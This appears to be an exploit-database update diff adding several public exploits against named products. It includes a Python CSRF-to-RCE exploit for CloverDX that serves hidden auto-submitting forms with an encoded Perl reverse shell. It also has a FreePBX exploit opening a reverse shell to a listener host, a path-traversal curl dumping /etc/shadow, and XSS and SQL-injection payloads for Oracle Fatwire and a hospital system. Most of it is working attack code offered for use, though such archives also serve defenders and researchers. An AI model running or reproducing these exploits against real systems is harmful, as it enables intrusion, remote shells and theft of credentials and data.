DB: 2021-07-30

9 changes to exploits/shellcodes

Splinterware System Scheduler Professional 5.30 - Privilege Escalation
Denver IP Camera SHO-110 - Unauthenticated Snapshot
Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download
IntelliChoice eFORCE Software Suite 2.5.9 - Username Enumeration
Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection
CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) to Remote Code Execution (RCE)
Oracle Fatwire 6.3 - Multiple Vulnerabilities

exploits/aspx/webapps/50164.txt

@@ -0,0 +1,95 @@
+# Exploit Title: IntelliChoice eFORCE Software Suite 2.5.9 - Username Enumeration
+# Date: 03.05.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.eforcesoftware.com
+
+IntelliChoice eFORCE Software Suite v2.5.9 Username Enumeration
+
+
+Vendor: IntelliChoice, Inc.
+Product web page: https://www.eforcesoftware.com
+Affected version: 2.5.9.6
+                  2.5.9.5
+                  2.5.9.3
+                  2.5.9.2
+                  2.5.9.1
+                  2.5.8.0
+                  2.5.7.20
+                  2.5.7.18
+                  2.5.6.18
+                  2.5.4.6
+                  2.5.3.11
+
+Summary: IntelliChoice is a United States software company that was
+founded in 2003, and offers a software title called eFORCE Software
+Suite. eFORCE Software Suite is law enforcement software, and includes
+features such as case management, court management, crime scene management,
+criminal database, dispatching, evidence management, field reporting,
+scheduling, court management integration, certification management,
+and incident mapping. With regards to system requirements, eFORCE
+Software Suite is available as SaaS, Windows, iPhone, and iPad software.
+
+Desc: The weakness is caused due to the login script and how it verifies
+provided credentials. Attacker can use this weakness to enumerate valid
+users on the affected application via 'ctl00$MainContent$UserName' POST
+parameter.
+
+Tested on: Microsoft-IIS/10.0
+           Microsoft-IIS/8.5
+           ASP.NET/4.0.30319
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2021-5658
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5658.php
+
+
+03.05.2021
+
+--
+
+
+Request/response for existent username:
+---------------------------------------
+
+POST /eFORCECommand/Account/Login.aspx HTTP/1.1
+
+__LASTFOCUS: 
+__EVENTTARGET: 
+__EVENTARGUMENT: 
+__VIEWSTATE: Xxx
+__VIEWSTATEGENERATOR: 4A5A1A0F
+__EVENTVALIDATION: Xxx
+ctl00$MainContent$UserName: eforce
+ctl00$MainContent$Password: 123456
+ctl00$MainContent$btnLogin.x: 20
+ctl00$MainContent$btnLogin.y: 7
+
+
+Response:
+Invalid password entered for username eforce.
+
+
+
+Request/response for non-existent username:
+-------------------------------------------
+
+POST /eFORCECommand/Account/Login.aspx HTTP/1.1
+
+__LASTFOCUS: 
+__EVENTTARGET: 
+__EVENTARGUMENT: 
+__VIEWSTATE: Xxx
+__VIEWSTATEGENERATOR: 4A5A1A0F
+__EVENTVALIDATION: Xxx
+ctl00$MainContent$UserName: testingus
+ctl00$MainContent$Password: 123456
+ctl00$MainContent$btnLogin.x: 20
+ctl00$MainContent$btnLogin.y: 7
+
+
+Response:
+Unable to login: User name testingus is not registered.

exploits/hardware/webapps/50162.txt

@@ -0,0 +1,16 @@
+# Exploit Title: Denver IP Camera SHO-110 - Unauthenticated Snapshot
+# Date: 28 July 2021
+# Exploit Author: Ivan Nikolsky (enty8080)
+# Vendor Homepage: https://denver.eu/products/smart-home-security/denver-sho-110/c-1024/c-1243/p-3826
+# Version: Denver SHO-110 (all firmware versions)
+# Tested on: Denver SHO-110
+
+Backdoor was found in a Denver SHO-110 IP Camera. Maybe other models also have this backdoor too.
+
+So, the backdoor located in the camera's second http service, allows the attacker to get a snapshot through `/snapshot` endpoint. There are two http services in camera: first - served on port 80, and it requires authentication, and the second - served on port 8001, and it does not require authentication.
+
+It's possible to write a script that will collect snapshots and add them to each other, so the attacker will be able to disclosure the camera stream.
+
+PoC:
+
+http://<host>:8001/snapshot

exploits/hardware/webapps/50163.txt

@@ -0,0 +1,81 @@
+# Exploit Title: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download
+# Date: 05.07.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.ljkj2012.com
+
+Longjing Technology BEMS API 1.21 Remote Arbitrary File Download
+
+
+Vendor: Longjing Technology
+Product web page: http://www.ljkj2012.com
+Affected version: 1.21
+
+Summary: Battery Energy Management System.
+
+Desc: The application suffers from an unauthenticated arbitrary
+file download vulnerability. Input passed through the fileName
+parameter through downloads endpoint is not properly verified
+before being used to download files. This can be exploited to
+disclose the contents of arbitrary and sensitive files through
+directory traversal attacks.
+
+Tested on: nginx/1.19.1
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2021-5657
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php
+
+
+05.07.2021
+
+--
+
+
+$ curl -sk https://10.0.0.8/api/downloads?fileName=../../../../../../../../etc/shadow
+
+root:*:18477:0:99999:7:::
+daemon:*:18477:0:99999:7:::
+bin:*:18477:0:99999:7:::
+sys:*:18477:0:99999:7:::
+sync:*:18477:0:99999:7:::
+games:*:18477:0:99999:7:::
+man:*:18477:0:99999:7:::
+lp:*:18477:0:99999:7:::
+mail:*:18477:0:99999:7:::
+news:*:18477:0:99999:7:::
+uucp:*:18477:0:99999:7:::
+proxy:*:18477:0:99999:7:::
+www-data:*:18477:0:99999:7:::
+backup:*:18477:0:99999:7:::
+list:*:18477:0:99999:7:::
+irc:*:18477:0:99999:7:::
+gnats:*:18477:0:99999:7:::
+nobody:*:18477:0:99999:7:::
+_apt:*:18477:0:99999:7:::
+
+
+$ curl -sk https://10.0.0.8/api/downloads?fileName=../../../../../../../../etc/passwd
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

exploits/java/webapps/50166.py

@@ -0,0 +1,137 @@
+# Exploit Title: CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) to Remote Code Execution (RCE)
+# Date: 14.04.2021
+# Exploit Author: niebardzo
+# Vendor Homepage: https://www.cloverdx.com/
+# Software Link: https://github.com/cloverdx/cloverdx-server-docker
+# Version: 5.9.0, 5.8.1, 5.8.0, 5.7.0, 5.6.x, 5.5.x, 5.4.x
+# Tested on: Docker image - https://github.com/cloverdx/cloverdx-server-docker
+# CVE : CVE-2021-29995
+
+# Replace the target, payload and port to host the exploitation server. Exploit requires, inbound connection to CloverDX
+# Victim authenticated to CloverDX and the java to run the ViewStateCracker.java.
+# Reference for cracking ViewState:
+# https://jazzy.id.au/2010/09/20/cracking_random_number_generators_part_1.html
+# https://blog.securityevaluators.com/cracking-javas-rng-for-csrf-ea9cacd231d2 
+#
+
+
+import http.server
+import socketserver
+import requests
+from urllib.parse import urlparse
+from urllib.parse import parse_qs
+from bs4 import BeautifulSoup
+import subprocess
+import sys
+import json
+
+
+class ExploitHandler(http.server.SimpleHTTPRequestHandler):
+	def do_GET(self):
+		self.send_response(200)
+		self.send_header("Content-Type", "text/html; charset=utf-8")
+		self.end_headers()
+		
+		# replace with your own target
+		target = "http://localhost:8080"
+
+		query_comp = parse_qs(urlparse(self.path).query)
+		if "target" in query_comp:
+			target = query_comp["target"][0]
+		
+		req = requests.get(target+"/clover/gui/login.jsf")
+
+		if req.status_code != 200:
+			sys.exit(-1)
+
+		# parse the reponse retrieve the ViewState
+		soup = BeautifulSoup(req.text, "html.parser")
+		cur_view_state = soup.find("input", {"name": "javax.faces.ViewState"})["value"]
+
+		# Use the ViewstateCracker.java to get new Viewstate.
+		new_view_state = subprocess.check_output(["java", "ViewstateCracker.java", cur_view_state])
+		new_view_state = new_view_state.decode("utf-8").strip()
+		print(new_view_state)
+		if new_view_state == "6927638971750518694:6717304323717288036":
+			html = ("<!DOCTYPE html><html><head></head><body><h1>Hello Clover Admin!</h1><br>"
+			+ "<script>window.setTimeout(function () { location.reload()}, 1500)</script></body></html>")
+		else:
+			html = ("<!DOCTYPE html><html><head>"
+			+ "<script>"
+			+ "function exec1(){document.getElementById('form1').submit(); setTimeout(exec2, 2000);}"
+			+ "function exec2(){document.getElementById('form2').submit(); setTimeout(exec3, 2000);}"
+			+ "function exec3(){document.getElementById('form3').submit(); setTimeout(exec4, 2000);}"
+			+ "function exec4(){document.getElementById('form4').submit();}"
+			+ "</script>"
+			+ "</head><body onload='exec1();'><h1>Hello Clover Admin! Please wait here, content is loading...</h1>"
+			+ "<script>history.pushState('','/');</script>"
+			+ "<form target='if1' id='form1' method='GET' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
+			+ "<input type='submit' value='' style='visibility: hidden;'></form> " 
+			+ "<form target='if2' id='form2' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target) 
+			+ "<input type='hidden' value='true' name='javax.faces.partial.ajax'>" 
+			+ "<input type='hidden' value='headerForm&#58;manualListenerItem' name='javax.faces.source'>" 
+			+ "<input type='hidden' value='@all' name='javax.faces.partial.execute'>" 
+			+ "<input type='hidden' value='allContent' name='javax.faces.partial.render'>" 
+			+ "<input type='hidden' value='headerForm&#58;manualListenerItem' name='headerForm&#58;manualListenerItem'>"
+			+ "<input type='hidden' value='headerForm' name='headerForm'>"
+			+ "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":","&#58;")) 
+			+ "<input type='submit' value='' style='visibility: hidden;'></form> "
+			+ "<form target='if3' id='form3' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target) 
+			+ "<input type='hidden' value='true' name='javax.faces.partial.ajax'>" 
+			+ "<input type='hidden' value='manualListeneForm&#58;taskType' name='javax.faces.source'>" 
+			+ "<input type='hidden' value='manualListeneForm&#58;taskType' name='javax.faces.partial.execute'>" 
+			+ "<input type='hidden' value='manualListeneForm&#58;taskFormFragment' name='javax.faces.partial.render'>" 
+			+ "<input type='hidden' value='valueChange' name='javax.faces.behavior.event'>"
+			+ "<input type='hidden' value='change' name='javax.faces.partial.event'>"
+			+ "<input type='hidden' value='manualListeneForm' name='manualListeneForm'>"
+			+ "<input type='hidden' value='shell_command' name='manualListeneForm&#58;taskType_input'>" 
+			+ "<input type='hidden' value='on' name='manualListeneForm&#58;saveRunRecord_input'>"
+			+ "<input type='hidden' value='true' name='manualListeneForm&#58;manualVariablesList_collapsed'>" 
+			+ "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":","&#58;")) 
+			+ "<input type='submit' value='' style='visibility: hidden;'></form> "
+			+ "<form target='if4' id='form4' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target) 
+			+ "<input type='hidden' value='true' name='javax.faces.partial.ajax'>" 
+			+ "<input type='hidden' value='manualListeneForm:execute_button' name='javax.faces.source'>" 
+			+ "<input type='hidden' value='@all' name='javax.faces.partial.execute'>" 
+			+ "<input type='hidden' value='rightContent' name='javax.faces.partial.render'>" 
+			+ "<input type='hidden' value='manualListeneForm:execute_button' name='manualListeneForm&#58;execute_button'>" 
+			+ "<input type='hidden' value='manualListeneForm' name='manualListeneForm'>" 
+			+ "<input type='hidden' value='' name='manualListeneForm&#58;properties&#58;propertiesTable&#58;propName'>" 
+			+ "<input type='hidden' value='' name='manualListeneForm&#58;properties&#58;propertiesTable&#58;propValue'>" 
+			+ "<input type='hidden' value='' name='manualListeneForm&#58;taskType_focus'>" 
+			+ "<input type='hidden' value='shell_command' name='manualListeneForm&#58;taskType_input'>"
+			#
+			# Below is the HTML encoded perl reverse, replace with your own payload, remember to HTML encode.
+			# 
+			+ "<input type='hidden' value='&#x70;&#x65;&#x72;&#x6c;&#x20;&#x2d;&#x65;&#x20;&#x27;&#x75;&#x73;&#x65;&#x20;&#x53;&#x6f;&#x63;&#x6b;&#x65;&#x74;&#x3b;&#x24;&#x69;&#x3d;"&#x31;&#x39;&#x32;&#x2e;&#x31;&#x36;&#x38;&#x2e;&#x36;&#x35;&#x2e;&#x32;"&#x3b;&#x24;&#x70;&#x3d;&#x34;&#x34;&#x34;&#x34;&#x3b;&#x73;&#x6f;&#x63;&#x6b;&#x65;&#x74;&#x28;&#x53;&#x2c;&#x50;&#x46;&#x5f;&#x49;&#x4e;&#x45;&#x54;&#x2c;&#x53;&#x4f;&#x43;&#x4b;&#x5f;&#x53;&#x54;&#x52;&#x45;&#x41;&#x4d;&#x2c;&#x67;&#x65;&#x74;&#x70;&#x72;&#x6f;&#x74;&#x6f;&#x62;&#x79;&#x6e;&#x61;&#x6d;&#x65;&#x28;"&#x74;&#x63;&#x70;"&#x29;&#x29;&#x3b;&#x69;&#x66;&#x28;&#x63;&#x6f;&#x6e;&#x6e;&#x65;&#x63;&#x74;&#x28;&#x53;&#x2c;&#x73;&#x6f;&#x63;&#x6b;&#x61;&#x64;&#x64;&#x72;&#x5f;&#x69;&#x6e;&#x28;&#x24;&#x70;&#x2c;&#x69;&#x6e;&#x65;&#x74;&#x5f;&#x61;&#x74;&#x6f;&#x6e;&#x28;&#x24;&#x69;&#x29;&#x29;&#x29;&#x29;&#x7b;&#x6f;&#x70;&#x65;&#x6e;&#x28;&#x53;&#x54;&#x44;&#x49;&#x4e;&#x2c;">&&#x53;"&#x29;&#x3b;&#x6f;&#x70;&#x65;&#x6e;&#x28;&#x53;&#x54;&#x44;&#x4f;&#x55;&#x54;&#x2c;">&&#x53;"&#x29;&#x3b;&#x6f;&#x70;&#x65;&#x6e;&#x28;&#x53;&#x54;&#x44;&#x45;&#x52;&#x52;&#x2c;">&&#x53;"&#x29;&#x3b;&#x65;&#x78;&#x65;&#x63;&#x28;"&#x2f;&#x62;&#x69;&#x6e;&#x2f;&#x73;&#x68;&#x20;&#x2d;&#x69;"&#x29;&#x3b;&#x7d;&#x3b;&#x27;' name='manualListeneForm&#58;shellEditor'>" 
+			+ "<input type='hidden' value='' name='manualListeneForm&#58;workingDirectory'>" 
+			+ "<input type='hidden' value='10000' name='manualListeneForm&#58;timeout'>" 
+			+ "<input type='hidden' value='true' name='manualListeneForm&#58;scriptVariablesList_collapsed'>" 
+			+ "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":","&#58;")) 
+			+ "<input type='submit' value='' style='visibility: hidden;'></form> "
+			+ "<iframe name='if1' style='display: hidden;' width='0' height='0' frameborder='0' ></iframe>"
+			+ "<iframe name='if2' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>"
+			+ "<iframe name='if3' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>"
+			+ "<iframe name='if4' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>"
+			+ "</body></html>")
+
+		self.wfile.write(bytes(html,"utf-8"))
+
+
+base64_enc_viewstatecracker = "CnB1YmxpYyBjbGFzcyBWaWV3c3RhdGVDcmFja2VyIHsKICAvKiBTVEFSVCBQQVJUIDEgKi8KICBwdWJsaWMgc3RhdGljIGZpbmFsIGludCBvZmZzZXQgICAgID0gMzI7CiAgcHVibGljIHN0YXRpYyBmaW5hbCBpbnQgaXRlcmF0aW9ucyA9IDY1NTM2OwoKICBwdWJsaWMgc3RhdGljIGZpbmFsIFN0cmluZyBnZW5lcmF0ZU5ld1ZpZXdzdGF0ZShmaW5hbCBsb25nIGlkSW5Mb2dpY2FsTWFwLCBmaW5hbCBsb25nIGlkSW5BY3R1YWxNYXApIHsKICAgIGZpbmFsIGxvbmcgZmlyc3QzMkJpdHNPZklkSW5Mb2dpY2FsTWFwICA9IGlkSW5Mb2dpY2FsTWFwID4+PiBvZmZzZXQ7CiAgICBmaW5hbCBsb25nIHNlY29uZDMyQml0c09mSWRJbkxvZ2ljYWxNYXAgPSAoKGlkSW5Mb2dpY2FsTWFwIDw8IG9mZnNldCkgPj4+IG9mZnNldCk7CiAgICBmaW5hbCBsb25nIGZpcnN0MzJCaXRzT2ZJZEluQWN0dWFsTWFwICAgPSBpZEluQWN0dWFsTWFwID4+PiBvZmZzZXQ7ICAgICAgICAgLy8gVmVyaWZpY2F0aW9uCiAgICBmaW5hbCBsb25nIHNlY29uZDMyQml0c09mSWRJbkFjdHVhbE1hcCAgPSAoKGlkSW5BY3R1YWxNYXAgPDwgb2Zmc2V0KSA+Pj4gb2Zmc2V0KTsgLy8gVmVyaWZpY2F0aW9uCiAgICAvKiBFTkQgUEFSVCAxICovCgogICAgLyogU1RBUlQgUEFSVCAyICovCiAgICBsb25nIHRoZV9zZWVkID0gMUw7CgogICAgZm9yIChpbnQgaSA9IDA7IGkgPCBpdGVyYXRpb25zOyBpKyspIHsKICAgICAgbG9uZyB0bXBfc2VlZCA9ICgoZmlyc3QzMkJpdHNPZklkSW5Mb2dpY2FsTWFwIDw8IDE2KSArIGkpOwogICAgICBpZiAoKChpbnQpKCgodG1wX3NlZWQgKiAweDVERUVDRTY2REwgKyAweEJsKSAmICgoMUwgPDwgNDgpIC0gMSkpID4+PiAxNikpID09IHNlY29uZDMyQml0c09mSWRJbkxvZ2ljYWxNYXApIHsKICAgICAgICAvL1N5c3RlbS5vdXQucHJpbnRsbigiU2VlZCBmb3VuZDogIiArIHRtcF9zZWVkKTsKICAgICAgICB0aGVfc2VlZCA9IHRtcF9zZWVkOwogICAgICAgIGJyZWFrOwogICAgICB9CiAgICB9CiAgICAvKiBFTkQgUEFSVCAyICovCgogICAgLyogU1RBUlQgUEFSVCAzICovCiAgICAvLyBHZW5lcmF0ZSBudW1iZXIgMiAoU2Vjb25kIE51bWJlciBvZiBpZEluTG9naWNhbE1hcCkKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwoKICAgIC8vQ2FsY3VsYXRlIHRoZSB2YWx1ZSBvZiBpZEluQWN0dWFsTWFwCiAgICB0aGVfc2VlZCA9ICh0aGVfc2VlZCAqIDB4NURFRUNFNjZETCArIDB4QkwpICYgKCgxTCA8PCA0OCkgLSAxKTsKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgLyogRU5EIFBBUlQgMyovCgogICAgLyogU1RBUlQgUEFSVCA0Ki8KICAgIC8qIENhbGN1bGF0ZSBhIG5ldyBpZEluTG9naWNhbE1hcCAqLwoKICAgIC8vIEdlbmVyYXRlIHRoZSBmaXJzdCBoYWxmIG9mIHRoZSBmaXJzdCBMb25nCiAgICB0aGVfc2VlZCA9ICh0aGVfc2VlZCAqIDB4NURFRUNFNjZETCArIDB4QkwpICYgKCgxTCA8PCA0OCkgLSAxKTsKICAgIGludCBudW1iZXJfNSA9ICgoaW50KSh0aGVfc2VlZCA+Pj4gMTYpKTsKCiAgICAvLyBHZW5lcmF0ZSB0aGUgc2Vjb25kIGhhbGYgb2YgdGhlIGZpcnN0IExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl82ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vSGVyZSBpcyB0aGUgbmV3IGlkSW5Mb2dpY2FsTWFwCiAgICBsb25nIG5ld19sb25nXzEgPSAoKChsb25nKW51bWJlcl81IDw8IDMyKSArIG51bWJlcl82KTsKCgogICAgLyogQ2FsY3VsYXRlIGEgbmV3IGlkSW5BY3R1YWxNYXAgKi8KCiAgICAvLyBHZW5lcmF0ZSB0aGUgZmlyc3QgaGFsZiBvZiB0aGUgc2Vjb25kIExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl83ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vIEdlbmVyYXRlIHRoZSBzZWNvbmQgaGFsZiBvZiB0aGUgc2Vjb25kIExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl84ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vCiAgICBsb25nIG5ld19sb25nXzIgPSAoKChsb25nKW51bWJlcl83IDw8IDMyKSArIG51bWJlcl84KTsKCiAgICByZXR1cm4gbmV3X2xvbmdfMSArICI6IiArIG5ld19sb25nXzI7CiAgICAvKkVORCBQQVJUNCovCiAgfQogcHVibGljIHN0YXRpYyB2b2lkIG1haW4gKFN0cmluZyBhcmdzW10pIHsKCVN0cmluZyB0b2tlbiA9IGFyZ3NbMF07CglTdHJpbmdbXSBsb25ncyA9IHRva2VuLnNwbGl0KCI6Iik7Cglsb25nIGxvbmcxID0gTG9uZy5wYXJzZUxvbmcobG9uZ3NbMF0pOwoJbG9uZyBsb25nMiA9IExvbmcucGFyc2VMb25nKGxvbmdzWzFdKTsKCVN0cmluZyBuZXdUb2tlbiA9IGdlbmVyYXRlTmV3Vmlld3N0YXRlKGxvbmcxLGxvbmcyKTsKCVN5c3RlbS5vdXQucHJpbnRsbihuZXdUb2tlbik7Cgp9Cgp9Cg=="
+
+#
+# This drops ViewstateCracker.java from above, ref: https://blog.securityevaluators.com/cracking-javas-rng-for-csrf-ea9cacd231d2
+#
+
+with open("ViewstateCracker.java","w") as f:
+    f.write(b64decode(bytes(base64_enc_viewstatecracker, 'utf-8')).decode('utf-8'))
+
+
+exploit_handler = ExploitHandler
+
+PORT = 6010
+
+exploit_server = socketserver.TCPServer(("", PORT), exploit_handler)
+
+exploit_server.serve_forever()

exploits/multiple/webapps/50167.txt

@@ -0,0 +1,32 @@
+# Exploit Title: Oracle Fatwire 6.3 - Multiple Vulnerabilities
+# Date: 29/07/2021
+# Exploit Author: J. Francisco Bolivar @Jfran_cbit
+# Vendor Homepage: https://www.oracle.com/index.html
+# Version: 6.3
+# Tested on: CentOS
+
+1. Xss
+
+Adt parameter is vulnerable to Xss:
+
+https://IPADDRESS/cs/Satellite?c=Page&cid=xxxx&pagename=xxxx&adt=<img
+src="a" onerror=alert(document.cookie);>
+
+2. Path Traversal
+
+https://IPADDRESS/cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
+
+3.   Blind Sql injection
+
+POST
+/cs/Satellite?cid=xx&pagename=XXXXXXX/elementIncludesestPractice/b/searchBestPractice
+HTTP/1.1
+Host: IPaddress
+
+pillar_bp=&subcategory_bp=&htlcd_bp=&id_ex=<SQL Injection>&command=XX
+
+The vulnerable parameter is : id_ex (POST)
+ Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: pillar_bp=&subcategory_bp=&htlcd_bp=&id_ex=203 AND
+3958=3958&command=xxxxxT

exploits/php/webapps/18650.py

@@ -3,7 +3,7 @@
 # Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
 # Google Dork: oy vey
 # Date: March 23rd, 2012
-# Author: muts
+# Author: muts, SSL update by Emporeo
 # Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
 # Tested on: multiple
 # CVE : notyet
@@ -15,11 +15,14 @@
 # http://www.exploit-db.com/exploits/18649
 ############################################################
 import urllib
+import ssl
 rhost="172.16.254.72"
 lhost="172.16.254.223"
 lport=443
 extension="1000"
 
+ssl._create_default_https_context = ssl._create_unverified_context
+
 # Reverse shell payload
 
 url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

exploits/php/webapps/50165.txt

@@ -0,0 +1,30 @@
+# Exploit Title: Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection
+# Date: 29.07.2021
+# Exploit Author: securityforeveryone.com
+# Vendor Homepage: https://care2x.org
+# Software Link: https://sourceforge.net/projects/care2002/
+# Version: =< 2.7 Alpha
+# Tested on: Linux/Windows
+# Researchers : Security For Everyone Team - https://securityforeveryone.com
+
+DESCRIPTION
+
+In Care2x < 2.7 Alpha, remote attackers can gain access to the database by exploiting a SQL Injection vulnerability via the "pday", "pmonth", "pyear" parameters.
+
+The vulnerability is found in the "pday", "pmonth", "pyear" parameters in GET request sent to page "nursing-station.php".
+
+Example:
+
+/nursing-station.php?sid=sid&lang=en&fwd_nr=&edit=1&retpath=quick&station=123123&ward_nr=1&dept_nr=&pday=[SQL]&pmonth=[SQL]&pyear=[SQL]&checkintern= 
+
+if an attacker exploits this vulnerability, attacker may access private data in the database system.
+
+EXPLOITATION
+
+# GET /nursing-station.php?sid=sid&lang=en&fwd_nr=&edit=1&retpath=quick&station=station&ward_nr=1&dept_nr=&pday=[SQL]&pmonth=[SQL]&pyear=[SQL]&checkintern= HTTP/1.1
+# Host: Target
+
+Sqlmap command: sqlmap.py -r request.txt --level 5 --risk 3 -p year --random-agent --dbs 
+
+Payload1: pyear=2021') RLIKE (SELECT (CASE WHEN (9393=9393) THEN 2021 ELSE 0x28 END)) AND ('LkYl'='LkYl
+Payload2: pyear=2021') AND (SELECT 4682 FROM (SELECT(SLEEP(5)))wZGc) AND ('dULg'='dULg

exploits/windows/local/49858.txt

@@ -1,49 +0,0 @@
-# Exploit Title: Splinterware System Scheduler Professional 5.30 - Privilege Escalation
-# Date: 2021-05-11
-# Exploit Author: Andrea Intilangelo
-# Vendor Homepage: https://www.splinterware.com
-# Software Link: https://www.splinterware.com/download/ssproeval.exe
-# Version: 5.30 Professional
-# Tested on: Windows 10 Pro 20H2 x64
-# CVE: CVE-2021-31771 
-
-System Scheduler Professional 5.30 is subject to privilege escalation due to insecure file permissions, impacting
-where the service 'WindowsScheduler' calls its executable. A non-privileged user could execute arbitrary code with
-elevated privileges (system level privileges as "nt authority\system") since the service runs as Local System;
-renaming the WService.exe file located in the software's path and replacing it with a malicious file, the new one
-will be executed after a short while.
-
-C:\Users\test>sc qc WindowsScheduler
-[SC] QueryServiceConfig OPERAZIONI RIUSCITE
-
-NOME_SERVIZIO: WindowsScheduler
-        TIPO                      : 10  WIN32_OWN_PROCESS
-        TIPO_AVVIO                : 2   AUTO_START
-        CONTROLLO_ERRORE          : 0   IGNORE
-        NOME_PERCORSO_BINARIO     : C:\PROGRA~2\SYSTEM~1\WService.exe
-        GRUPPO_ORDINE_CARICAMENTO :
-        TAG                       : 0
-        NOME_VISUALIZZATO         : System Scheduler Service
-        DIPENDENZE                :
-        SERVICE_START_NAME : LocalSystem
-
-C:\Users\test>icacls C:\PROGRA~2\SYSTEM~1\
-C:\PROGRA~2\SYSTEM~1\ BUILTIN\Users:(RX,W)
-                      BUILTIN\Users:(OI)(CI)(IO)(GR,GW,GE)
-                      NT SERVICE\TrustedInstaller:(I)(F)
-                      NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
-                      NT AUTHORITY\SYSTEM:(I)(F)
-                      NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
-                      BUILTIN\Administrators:(I)(F)
-                      BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
-                      BUILTIN\Users:(I)(RX)
-                      BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
-                      CREATOR OWNER:(I)(OI)(CI)(IO)(F)
-                      AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX)
-                      AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(OI)(CI)(IO)(GR,GE)
-                      AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX)
-                      AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(OI)(CI)(IO)(GR,GE)
-
-Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file
-
-C:\Users\test>

files_exploits.csv
